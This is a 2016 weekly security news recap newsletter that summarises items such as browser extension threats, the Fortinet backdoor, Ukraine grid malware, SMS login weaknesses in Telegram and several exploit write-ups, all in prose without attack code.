RSS feed

Downclimb: Summit Route's Weekly Infosec News Recap
2016.01.17 – 2016.01.24:
To receive a weekly email notification of this newsletter, email


"Hotlinking to randomly hosted js libraries is the new hotlinking to images. Except instead of goatse, your users get owned instead" ‏@liamosaur


"Attempt: prevent malware.
Accomplish: become malware.
I don't know. Do we give AV vendors partial credit or not?" @tedunangst


"Attackers win when they know target's network better than target. Hunters win when they know attacker's tactics/tools better than attackers" @armitagehacker


"Now we have a new generation of researchers who've never done anything in cyberspace besides read email" Richard Bejtlich


"I just want someone to look at me the same way a Go developer looks at their own API structure." I Am Devloper

Top stories

Browser extension dangers

In The Web Is Dangerous: Phishing and Browser Extensions, the author highlights the dangers of browser extensions. Specifically that they have access to the content and input you type for all the sites you visit, and that there is a market for people to buy popular browser extensions and turn them into adware. This happened in the past with Hover Zoom for example, which has millions of users, but has happened with many others as well. Although those instances were only used for ads and tracking, these extensions could easily be subverted to steal account credentials.

Browser extensions can usually be installed by unwitting users despite things like application white-listing, and no existing EDR solution gives insight into the browser extensions being installed by your employees. This week saw a number of new threats in the browser extension ecosystem, such as a set of Chrome extensions that stole CounterStrike inventory (link), and a Firefox extension installed by malware for Man-in-the-browser attacks for stealing money when users log into online banks (link).

Reversing Apple’s syslogd bug

In-depth post showing how to diff Apple's OSX patches. Lot's of great concepts and lessons covered. Link.


Conference materials and publications

  • BSides NYC slides: Conference in New York City last week.
  • Static Program Analysis: Course materials from this graduate course at Aarhus University in Denmark are available for those that want to learn about writing automated source code analyzers.


  • AWS Certificate Manager: Amazon AWS is finally providing an easy way to obtain and use SSL certs. They are also free!
  • MacDBG: Mac Debugger was created because OSX uses a debugger called lldb that has different commands than gdb.
  • Cuckoo Sandbox 2.0: This massive upgrade of the malware detonation environment now includes Windows 64-bit, OSX, Linux, and Android support. Additionally, network signatures can be used and HTTPS interception and decryption is now performed. This release is mostly a combination of the many forks that have occurred to the project over the years.
  • qiew: Long ago there was a program created called hiew, short for Hacker's View, which was a hex editor and disassembler. If you ever see a screenshot of hex on a dark blue background that looks like some sort of DOS prompt, that's hiew. Qiew is an open-source clone.

Other reads

  • Fortinet backdoor actually in current models: Following on the disclosure of backdoors in Fortinet devices last week, which were believed to have been patched out of more recent products, Fortinet has announced that this backdoor exists in current products as well, but maintains their view that this is not a malicious backdoor, since Fortinet inserted the easily exploitable backdoor themselves, unlike the Juniper backdoors which unknown attackers had inserted.
  • Ukraine cyberattack malware analysis: This report from the Chinese company Knownsec disects the malware in the recent cyberattack against the Ukraine power grid. Of interest is the malware tries to wipe or delete all files from the hard-drives.
  • On SMS logins: an example from Telegram in Iran: This article high-lights a couple of concepts. One is that using SMS for logins is a horrible idea because anyone with an IMSI catcher can access those accounts. The other is, as the authors put it "Unlike surveillance, censorship can be observed." The article notes a number of political accounts in Iran were shutdown by the owners, which is to say, the accounts were likely hacked by the government and shutdown that way. 20% of the userbase of Telegram is in Iran, and a strong case is made that the reason for it's use there is that Iran is able to intercept and control the service there. It's been said many times, but if you have any concerns over security and privacy, stop using Telegram, and use Signal instead. If you're in a hostile environment and are finding that one form of communication works better than others, it's possible that you're being herded towards the option your attacker has control over.
  • Autopwn every Android device on your network using BetterCap and the "addJavascriptInterface" vulnerability.: The title is misleading as this will only work against older Androids from before 4.2, which was released in 2012. But, it shows the dangers of MiTM against communications without crypto. This post shows how to use an old addJavascriptInterface vulnerability (CVE-2012-6636), written about here in 2013. If you have MiTM capabilities against older Androids, and those devices runs apps that download javscript libraries over HTTP, you can get shell access.
  • Analysis and Exploitation of a Linux Kernel Vulnerability (CVE-2016-0728): This write-up discusses a local privilege escalation vuln involving looping 2^32 times in order to overflow an int.
  • The Great Graph: I wrote about the problems of trust exploitaiton, especially with regard to attackers increasingly using connections between companies to jump from one to the other.